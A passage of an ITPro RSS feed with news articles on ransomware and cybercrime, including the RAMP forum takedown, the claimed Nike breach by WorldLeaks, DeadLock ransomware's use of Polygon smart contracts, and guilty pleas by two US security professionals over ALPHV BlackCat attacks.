</p><p>The site also included discussion groups and cyber attack tutorials.</p><p>"The reason for its success was that it offered criminals a marketplace supporting the entire attack chain, from the ability to buy stolen credentials, promote malware or sell and purchase ransomware services," said Ben Clarke, SOC manager at CybaVerse.</p><h2 id="will-the-takedown-stick">Will the takedown stick?</h2><p>Clarke added that while the takedown will affect criminal activity for a while, the long-term impact could be minimal.</p><p>"Anything to disrupt this activity is a positive step for defenders. But we would be naive to believe it will have a tangible impact on cyber crime," he said. "New marketplaces will be formed to take RAMP’s place, while threat actors will navigate to other platforms to buy and sell services."</p><p>Law enforcement takedowns in recent years have achieved mixed results. While they do disrupt operations, forums are often revived, as with the <a href="https://www.itpro.com/security/malware/358450/europol-takes-down-dangerous-emotet-botnet"><u>Emotet botnet takedown</u></a> in 2022. In this instance, the <a href="https://www.itpro.com/security/cyber-attacks/369526/hundreds-of-thousands-of-emotet-attacks-spotted-daily-after-hiatus"><u>botnet returned with a vengeance</u></a>.</p><p>This doesn't mean that these operations are futile, however. Daniel Wilcock, threat intelligence analyst at Talion, said takedowns are still a key tactic for law enforcement to stifle cyber criminal activities and gain vital intelligence. 
</p><p>"While this doesn't signal the end of ransomware, law enforcement will be able to gain valuable information from the seizure around the threat actors using the services, such as their emails and IP addresses plus access to the financial transactions that took place on the market," he said.</p><p>"This could support further law enforcement action against the threat actors that used the site, but given that RAMP was heavily used by Russian criminals it's highly unlikely we will see many actual arrests." </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Everything we know so far about the Nike data breach ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/data-breaches/everything-we-know-so-far-about-the-nike-data-breach</link>
                                                                            <description>
                            <![CDATA[ Hackers behind the WorldLeaks ransomware group claim to have accessed sensitive corporate data ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">RQPiXZQAgvbMN6mcFnWGYm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/hKDg9HJeNfft4roCAaoUod-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 27 Jan 2026 14:52:54 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Data Breaches]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                <author><![CDATA[ ross.kelly@futurenet.com (Ross Kelly) ]]></author>                    <dc:creator><![CDATA[ Ross Kelly ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/Y5vrV2V98Np6jHAGmAtCd3.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/hKDg9HJeNfft4roCAaoUod-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Nike tick logo pictured on a storefront sign in San Francisco, USA.]]></media:description>                                                            <media:text><![CDATA[Nike tick logo pictured on a storefront sign in San Francisco, USA.]]></media:text>
                                <media:title type="plain"><![CDATA[Nike tick logo pictured on a storefront sign in San Francisco, USA.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/hKDg9HJeNfft4roCAaoUod-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Nike has confirmed it is investigating a potential data breach amidst claims hackers have accessed sensitive company data. </p><p>Hackers behind the WorldLeaks <a href="https://www.itpro.com/security/ransomware/the-top-ransomware-trends-for-businesses"><u>ransomware group</u></a> claim to have accessed up to 1.4TB of internal data, adding the company to its leak site. </p><p>Exact details on the data stolen by the group are yet to be revealed. However, a sample published by the group points toward design and manufacturing information. </p><p>Data shared by WorldLeaks includes directories titled “Women’s Sportswear” and “Training Resources - Factory”, for example. </p><p>At present, it does not appear that sensitive customer or employee data was compromised in the attack. </p><p>In a statement given to <a href="https://www.infosecurity-magazine.com/news/worldleaks-ransomware-14tb-nike/" target="_blank"><em>Infosecurity Magazine</em></a>, a spokesperson for Nike said: “We always take consumer privacy and data security very seriously. We are investigating a potential cybersecurity incident and are actively assessing the situation.”</p><p><em>ITPro</em> has approached Nike for additional comment and clarification. </p><h2 id="nike-data-breach-could-have-ramifications">Nike data breach could have ramifications</h2><p>Initial analysis of the data dump from threat intelligence group, <a href="https://x.com/justabreach/status/2015188216291180865" target="_blank"><u>Justabreach</u></a>, suggests the data stolen by WorldLeaks dates as far back as 2020. </p><p>While no customer data appears to have been compromised thus far, the long-term damage of this attack could be significant for the sportswear giant. </p><p>Sensitive documents on manufacturing processes and product information have been impacted. </p><p>Shankar Haridas, head of UKI at ManageEngine, said this could have huge ramifications for the company. 
</p><p>“For large brands, the risk rarely stops at customer records,” he said. </p><p>“Product roadmaps, supplier contracts, pricing models, and internal comms are often just as valuable to attackers. A leak of this scale can create long-term competitive and reputational damage, even before the facts are fully confirmed.”</p><h2 id="what-you-need-to-know-about-worldleaks">What you need to know about WorldLeaks</h2><p>WorldLeaks has claimed a number of victims in recent years, including Dell and <a href="https://www.itpro.com/security/ransomware/tata-technologies-hit-by-ransomware-attack"><u>Tata Technologies</u></a>, and is believed to be the successor group to Hunters International. </p><p>The notorious threat group <a href="https://www.itpro.com/security/ransomware/hunters-international-ransomware-shut-down"><u>confirmed plans to shut down</u></a> in July last year, offering victims a decryptor to regain access to stolen data. The announcement wasn’t quite a goodwill gesture, however. </p><p>Speaking to <em>ITPro </em>at the time, Dray Agha, senior manager of security operations at Huntress, said the group was essentially just rebranding under a new name. </p><p>David Sancho, senior threat researcher at Trend Micro, said the attack against Nike follows a dormant period for the group, which now appears to have large corporations in its crosshairs once again. </p><p>“There’s no question that World Leaks is going after large companies,” he said. “Nike is the latest and follows a ‘quiet period’ between the last observed Hunters International attack (last July) and the first attack after the group rebranded as “World Leaks” (last September).”</p><p>Sancho noted that the “standout trait” of WorldLeaks is that it’s a data exfiltration group, meaning it focuses primarily on stealing data, then asking for money in exchange for not leaking it to the public. 
</p><p>“This stands in contrast with the traditional ransomware strategy of encrypting the data and asking for payment in order to decrypt it.”</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware is on the rise. Again ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/ransomware-is-on-the-rise-again</link>
                                                                            <description>
                            <![CDATA[ Ransomware resurges with AI-driven sophistication, challenging defenders and creating opportunities for MSPs ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Tvk7bXaN9woWdpj6YntSXc</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 21 Jan 2026 08:00:00 +0000</pubDate>                                                                                                                                <updated>Mon, 26 Jan 2026 13:26:18 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Daniel Blank ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/GpVEytUaHjeTjt6ExBtGWH.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:description>                                                            <media:text><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:text>
                                <media:title type="plain"><![CDATA[Circuit board with word ransomware lit up in neon red]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/2rdWoqNdk32nyzW9Qqq4GN-1280-80.jpeg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>For years, it felt like we were slowly but surely gaining ground in an uphill battle against ransomware. Attack numbers were cooling off, organizations were getting smarter, and defensive tools were maturing. </p><p>But, for the first time in years, the momentum has shifted, and not for the better. Researchers are ringing the alarm: ransomware is climbing again, attacks are getting smarter, and adversaries are adopting artificial intelligence (AI) faster than many defenders can keep up.</p><p>For channel partners and Managed Service Providers (MSPs), this isn’t just another moment in the news cycle. It’s also an opportunity to educate their customers and provide them with the solutions they need to combat cyber threats more effectively.</p><h2 id="ransomware-s-quiet-comeback">Ransomware’s quiet comeback</h2><p>What’s striking about the latest wave isn’t just the increase in the volume of activity, but how rapidly attackers have evolved. Ransomware groups have regrouped, retooled, and are now operating with a level of sophistication not seen before in cybersecurity.</p><p>Attackers are leaning heavily on automation, AI-generated phishing, and coordinated extortion operations. Phishing appears to have re-emerged as the most reliable doorway in, not because people are less cautious, but because the lures are now much more difficult to distinguish from legitimate communication. AI has given cybercriminals a frightening edge: scale and believability.</p><h2 id="the-new-attack-playbook">The new attack playbook</h2><p>Phishing <a href="https://www.hornetsecurity.com/en/ransomware-report/"><u>remains</u></a> the most reliable and familiar workhorse for most ransomware crews, but that’s only part of the story. Stolen credentials, session hijacking, and compromised endpoints are playing a bigger role than in previous years. 
</p><p>Ultimately, attackers have concluded that targeting identity and access management tools often yields a far higher payout than hammering at technical vulnerabilities.</p><p>Many of these techniques are now automated, meaning small businesses, especially those relying on outdated filtering or inconsistent endpoint practices, are increasingly caught in the crosshairs.</p><p>Organizations are clearly hungry for modern defenses to meet these modern challenges, but they often don’t know where to start. Right now, MSPs have an opening to step up their game by offering their customers more advanced identity protection, AI-enhanced email security, and automated phishing-resistance training that puts them ahead of the curve.</p><h2 id="the-cyber-insurance-safety-net-is-fraying">The cyber insurance safety net is fraying</h2><p>Organizations sometimes assume cyber insurance will save them when the worst happens, or that it cuts back on the need for other forms of protection. But that assumption is incorrect. </p><p>Recent <a href="https://www.pymnts.com/cybersecurity/2025/insurer-beazley-steps-back-from-cyber-market-as-attacks-surge/"><u>insights</u></a> highlight a common theme: policies are getting stricter, premiums are climbing, and insurers are pushing back on payouts when the right controls aren’t in place.</p><p>This shift means companies can’t “insure their way out” of ransomware. MSPs are increasingly being asked to help customers weigh the cost-benefit of insurance versus strengthening resilience, and, in many cases, proactive security investments win out. The fact is that companies are increasingly unlikely to qualify for cyber insurance if they do not have robust cybersecurity systems.</p><h2 id="recovery-is-improving-but-not-fast-enough">Recovery is improving, but not fast enough</h2><p>Don’t despair: there <em>is</em> some good news. 
With a few years of experience under their belts, organizations are getting better at detecting and containing attacks quickly. More companies now have dependable and immutable backups, disaster-recovery playbooks, and the confidence to avoid paying ransoms.</p><p>But the human side of security hasn’t kept pace the way it needs to. Leaders still underestimate how much risk comes from everyday behaviors. An employee who approves a fake MFA request, a manager who reuses passwords, or an intern who clicks a well-disguised link can set into motion a domino effect of consequences with massive ramifications.</p><p>In many cases, training programs exist, but they’re ineffective or outdated. “Check-the-box” security awareness simply can’t compete with AI-powered attacks designed to mimic real people. </p><p>This is where MSPs can have an outsized impact, by offering cyber awareness training that’s automated, personalized, ongoing, and tied to tangible threats happening in real time. </p><p>Even with the most sophisticated firewalls, human error has a way of resurfacing as the most common source of breaches. In this scenario, expertise and cyber-resilience are more valuable than ever, and MSPs are in a great position to offer access to this. </p><h2 id="what-this-all-means-for-msps-and-channel-partners">What this all means for MSPs and channel partners</h2><p>We’re entering a different era of ransomware in which the quantity and quality of attacks are no longer mutually exclusive. Hackers are creating traps that are more convincing than ever, and they’re doing it at scale. </p><p>But it’s also an era where MSPs have more tools, intelligence, and AI capabilities at their disposal to help customers build real resilience. So, what can you do? </p><p>For one, MSPs can focus on offering clients expertise in addition to next-gen tools. Providing integrated protection can help to solidify a business’s reputation as a trusted guide in precarious times. 
</p><p>It also falls on MSPs to help client organizations understand what “good security” really looks like beyond the safety blanket of insurance. </p><p>Finally, it is up to the MSP to make the most of AI-powered tools and take advantage of their capabilities to detect, prevent, and respond to threats faster than ever.</p><p>The resurgence of ransomware isn’t a sign that cybersecurity is failing, only that the threat landscape has shifted. And channel partners who help customers adapt to this new reality have an opportunity not only to better protect their clients, but to establish themselves as authorities in this new domain. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ There’s a dangerous new ransomware variant on the block – and cyber experts warn it’s flying under the radar ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/deadlock-ransomware-polygon-smart-contract-abuse</link>
                                                                            <description>
                            <![CDATA[ The new DeadLock ransomware family is taking off in the wild, researchers warn ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">m57Hg7V7mpV9CyhGdcTjwC</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 14 Jan 2026 11:29:39 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Group-IB is warning of a dangerous new DeadLock <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>family based on the abuse of Polygon smart contracts.</p><p>A smart contract is a self-executing program stored on a <a href="https://www.itpro.com/security/28031/what-is-blockchain">blockchain </a>that automatically enforces predefined rules or agreements without intermediaries. </p><p>DeadLock works through the stealthy usage of Polygon smart contracts for proxy address <a href="https://www.itpro.com/hardware/desktops/storage">storage</a>. This, Group-IB analysts warned, is a poorly-documented and under-reported technique that they've seen increasingly being used in the wild. </p><p>There are numerous variants currently in use, which allows threat actors to bypass traditional defenses by abusing decentralized blockchains worldwide.</p><p>"This exploit of smart contracts to deliver proxy addresses is an interesting method where attackers can literally apply infinite variants of this technique; imagination is the limit," the researchers said. </p><p>DeadLock, first discovered in July 2025, is unusual in not being associated with any known affiliate programs and for lacking a data leak site. This, combined with the limited number of reported victims, means it's largely flown under the radar.</p><p>"However, Group-IB specialists have discovered an interesting use of Polygon smart contracts for proxy server address rotation or distribution," the researchers said. 
</p><p>"This finding warrants public attention, especially since the abuse of this specific blockchain for malicious purposes has not been widely reported."</p><h2 id="how-deadlock-operates">How DeadLock operates</h2><p>The initial access vector and other important stages of the attacks remain unknown, according to Group-IB, although toolset analysis reveals the use of Anydesk as a <a href="https://www.itpro.com/business/business-operations/367876/best-network-monitoring-tools">remote monitoring and management</a> tool. </p><p>DeadLock then deletes several services on the victim’s machine, along with shadow copies to maximize impact. </p><p>The attackers set the file extension of all the encrypted files to .dlock, change file icons and take over the victim’s wallpaper, telling the victim to open the ransom note and follow the instructions. The main targets, Group-IB revealed, are in Italy, Spain, and India.</p><p>"DeadLock seems to have reactivated its operations by recently setting up a new proxy server," the researchers warn. "Although it’s low profile and yet low impact, it applies innovative methods that showcase an evolving skillset which might become dangerous if organizations do not take this emerging threat seriously."</p><p>Smart contracts are becoming an increasing target for cyber criminals, with Google warning last autumn that the North Korean threat actor UNC5342 was using a technique dubbed “EtherHiding” to deliver malware and facilitate <a href="https://www.itpro.com/digital-currency/30249/what-is-cryptocurrency-mining">cryptocurrency </a>theft.</p><p>This consists of leveraging transactions on public blockchains to store and retrieve malicious payloads. 
According to <a href="https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding" target="_blank"><u>research from Google</u></a>, this is highly resilient against conventional takedown and blocklisting efforts.</p><p>Around the same time, two new pieces of <a href="https://www.itpro.com/security/open-source-malware-surged-by-156-percent-in-2024">open source malware</a> were uncovered on the npm package repository by <a href="https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code" target="_blank"><u>ReversingLabs researchers</u></a>, exploiting smart contracts for the Ethereum blockchain to load malware on compromised devices.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Hacker offering US engineering firm data online after alleged breach ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-attacks/hacker-offering-us-engineering-firm-data-online-after-alleged-breach</link>
                                                                            <description>
                            <![CDATA[ Data relating to Tampa Electric Company, Duke Energy Florida, and American Electric Power was allegedly stolen ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">jh9aTUhGsytBhJ5PDe8U6k</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 07 Jan 2026 14:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cyber Attacks]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A cyber criminal is claiming to have seized data from Florida-based engineering firm Pickett and Associates relating to three US utilities.</p><p>Pickett provides transmission and distribution power line design, aerial surveying, and LiDAR services to major utilities and mining firms across the US and the Caribbean.</p><p>The hacker in question is now <a href="https://x.com/MonThreat/status/2006989633322692633" target="_blank"><u>offering</u></a> around 139 GB of engineering data - 892 files - about Tampa Electric Company, Duke Energy Florida, and American Electric Power on a <a href="https://www.itpro.com/business/google-is-scrapping-its-dark-web-report-feature-heres-everything-you-need-to-know-and-some-alternative-options">dark web</a> forum. </p><p>There's an asking price of 6.5 bitcoin, or a little under $600,000.</p><p>The data is claimed to include more than 800 classified raw LiDAR point cloud files in .las format, ranging from 100 MB to 2 GB in size, along with full coverage of transmission line corridors and substations, including layers for bare earth, vegetation, conductors, and structure.</p><p>Also apparently up for sale are high-resolution orthophotos in .ecw format, microStation design files and PTC settings, large vegetation feature files in .xyz format and preserved folder structures from active projects.</p><p>"This dataset contains real, operational engineering data from active projects of major utilities and is suitable for infrastructure analysis, modelling, risk assessment of specialized research," the hacker said. </p><p>Tampa Electric Company has around 860,000 business and residential customers in West Central Florida, while Duke Energy Florida has about two million. American Electric Power, meanwhile, boasts nearly 5.6 million customers across 11 states. 
</p><p><em>ITPro </em>approached Pickett and Associates for comment, but did not receive a response by the time of publication.</p><h2 id="german-solar-company-data-up-for-grabs">German solar company data up for grabs</h2><p>The same criminal is also offering what's claimed to be an internal database belonging to Hamburg, Germany-based solar energy firm Enerparc AG. The data is claimed to include information about solar projects in Spain’s Mallorca and Alicante regions. </p><p>According to <a href="https://assets.sophos.com/X24WTUEQ/at/75tnw38cqsnrrv56wpwc78k/sophos-state-of-ransomware-critical-infrastructure-2024.pdf" target="_blank"><u>research</u></a> from Sophos, 67% of energy, oil or gas and utilities firms suffered a ransomware attack in 2024, up from 55% in 2020. </p><p>This time last year, Trustwave <a href="https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2025_Trustwave_Energy_Utilities_Risk_Radar_Report.pdf" target="_blank"><u>said</u></a> that ransomware attacks targeting the energy and utilities sectors rose by 80% in 2024. </p><p>Energy firms are frequently targeted by hacktivists and nation state actors including Russia, China, Iran and North Korea, with China's <a href="https://www.itpro.com/security/cyber-attacks/volt-typhoon-threat-group-electric-grid">Volt Typhoon</a> hitting a number of power utilities in 2023. </p><p>All in all, US critical infrastructure operators reported almost 4,900 <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity </a>threats in 2024.</p><h2 id="critical-industries-in-the-crosshairs">Critical industries in the crosshairs</h2><p>According to recent <a href="https://www.kelacyber.com/resources/research/escalating-ransomware-threats-to-national-security/" target="_blank"><u>research</u></a> from security firm Kela, global <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>attacks against critical industries rose by 34% in 2025. 
</p><p>The US was the most-affected country, accounting for 21% of global incidents, followed by Canada, Germany, the UK, and Italy.</p><p>"In critical industries, such disruptions can have national-level consequences, undermining essential operations and eroding public trust," commented Lin Levi, Kela threat intelligence team lead.</p><p>"To protect critical services, governments and critical industry sectors must prioritize proactive preventative measures and maintain continuous real-time monitoring to detect and respond to cyber threats."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Cybersecurity experts face 20 years in prison following ransomware campaign ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/cybersecurity-experts-face-20-years-in-prison-following-ransomware-campaign</link>
                                                                            <description>
                            <![CDATA[ Two men used their tech expertise to carry out ALPHV BlackCat ransomware attacks ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">YwMMNB6gfVuwvTVR73aFEU</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LEn4RWFLrJ7FxZPhnQgKsP-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 02 Jan 2026 14:16:08 +0000</pubDate>                                                                                                                                <updated>Mon, 05 Jan 2026 09:09:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                        <dc:contributor><![CDATA[ Jane McCallion ]]></dc:contributor>
                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LEn4RWFLrJ7FxZPhnQgKsP-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[FBI seal and insignia pictured on the FBI headquarters building in Washington D.C., United States.]]></media:description>                                                            <media:text><![CDATA[FBI seal and insignia pictured on the FBI headquarters building in Washington D.C., United States.]]></media:text>
                                <media:title type="plain"><![CDATA[FBI seal and insignia pictured on the FBI headquarters building in Washington D.C., United States.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LEn4RWFLrJ7FxZPhnQgKsP-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>Two US cybersecurity experts have pleaded guilty to using ALPHV BlackCat ransomware to extort businesses across the USA during a seven-month campaign in 2023.</p><p>40-year-old Ryan Goldberg of Georgia and 36-year-old Kevin Martin of Texas admitted conspiring to obstruct, delay, or affect commerce through extortion <a href="https://www.justice.gov/opa/pr/two-americans-plead-guilty-targeting-multiple-us-victims-using-alphv-blackcat-ransomware"><u>in a federal district court in the Southern District of Florida</u></a>. </p><p>Goldberg was an incident response manager at the time he and Martin, as well as one other unnamed individual, turned their skills to nefarious activities. Martin, meanwhile, was a ransomware threat negotiator. </p><p>Their campaign, which ran from April to December 2023, saw the trio turn to the ALPHV BlackCat ransomware-as-a-service operators, whom they agreed to pay a 20% share of any ransoms received in exchange for access to the ransomware and extortion platform.</p><p>They then successfully used the malware against numerous US targets, including a pharmaceutical company based in Maryland, an engineering company based in California, a drone manufacturer in Virginia, and a medical company from Florida, where the case was heard.</p><p>One victim paid the equivalent of $1.2 million in Bitcoin in order to put an end to the attack, with the proceeds split three ways between the conspirators after they had given the ALPHV BlackCat administrators their cut.</p><p>Assistant attorney general A. 
Tysen Duva of the Justice Department’s Criminal Division said: “These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop.” </p><h2 id="millions-of-dollars-saved-following-ransomware-disruption">Millions of dollars saved following ransomware disruption</h2><p>ALPHV BlackCat was active for 18 months before the FBI developed a decryption tool for the ransomware, extorting millions of dollars from businesses primarily in the US before going dark in December 2023. The law enforcement agency estimates it saved victims in the order of $99 million in ransomware payments.</p><p>“The FBI remains committed to working alongside its law enforcement partners to disrupt and dismantle criminal enterprises involved in ransomware attacks and to hold accountable not only the perpetrators but also anyone who knowingly enables or profits from them,” said special agent in charge Brett Skiles of the FBI Miami Field Office. </p><p>US attorney Jason A Reding Quiñones, representing the Southern District of Florida, said: “Goldberg and Martin used trusted access and technical skill to extort American victims and profit from digital coercion.”</p><p>“Their guilty pleas make clear that cybercriminals operating from within the United States will be found, prosecuted, and held to account,” he added.</p><p>The pair are set to be sentenced on 12 March 2026 and face a maximum penalty of 20 years in prison.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 15-year-old revealed as key player in Scattered LAPSUS$ Hunters ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/cyber-crime/15-year-old-revealed-as-key-player-in-scattered-lapsus-usd-hunters</link>
                                                                            <description>
                            <![CDATA[ 'Rey' says he's trying to leave Scattered LAPSUS$ Hunters and is prepared to cooperate with law enforcement ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zBxmT5CgDixJiMrXLmNAZf</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9AjMFuVUqXnko5FNhrMuKC-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 28 Nov 2025 13:23:42 +0000</pubDate>                                                                                                                                <updated>Fri, 28 Nov 2025 13:28:57 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Crime]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/9AjMFuVUqXnko5FNhrMuKC-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Hacker concept image showing young man with hood covering face typing on a keyboard in a dark room.]]></media:description>                                                            <media:text><![CDATA[Hacker concept image showing young man with hood covering face typing on a keyboard in a dark room.]]></media:text>
                                <media:title type="plain"><![CDATA[Hacker concept image showing young man with hood covering face typing on a keyboard in a dark room.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9AjMFuVUqXnko5FNhrMuKC-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>Security researcher Brian Krebs has <a href="https://krebsonsecurity.com/2025/11/meet-rey-the-admin-of-scattered-lapsus-hunters/" target="_blank"><u>unmasked one of the apparent culprits</u></a> behind the Jaguar Land Rover and M&S cyber attacks as a Jordanian teenager. </p><p>Krebs approached the 15-year-old, who had been using the pseudonym ‘Rey’ on Telegram, and confirmed his real identity. </p><p>The teenager said he has been in contact with various international law enforcement agencies, such as Europol, and hasn’t carried out any hacking activities since September.</p><p>“I’m already cooperating with law enforcement,” he said. “In fact, I have been talking to them since at least June,” he told Krebs.</p><p>Krebs noted that he was unable to confirm these details following contact with the individual. </p><p>Scattered LAPSUS$ Hunters, of which 'Rey' is just one of three administrators, has been behind numerous extortion attempts. According to Krebs, he was previously an administrator of the data leak website for Hellcat, a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>group involved in <a href="https://www.itpro.com/security/cyber-attacks/schneider-electric-confirms-breach-after-hacker-claims-to-have-40gb-of-stolen-data">attacks on Schneider Electric</a>, Telefonica, and Orange Romania.</p><p>The teenager was also an administrator of the latest incarnation of the English-language leak site <a href="https://www.itpro.com/security/cyber-crime/fbi-seizes-breachforums-infrastructure-but-successor-sites-are-already-popping-up">BreachForums</a>.</p><p>While cyber crime groups like this are often portrayed as being part of organized crime, 'Rey' is one of a growing number of hackers who turn out to be normal teenagers.</p><h2 id="how-krebs-snared-rey">How Krebs snared ‘Rey’</h2><p>According to Krebs, a series of mistakes on Rey's part enabled the researcher to track him down. 
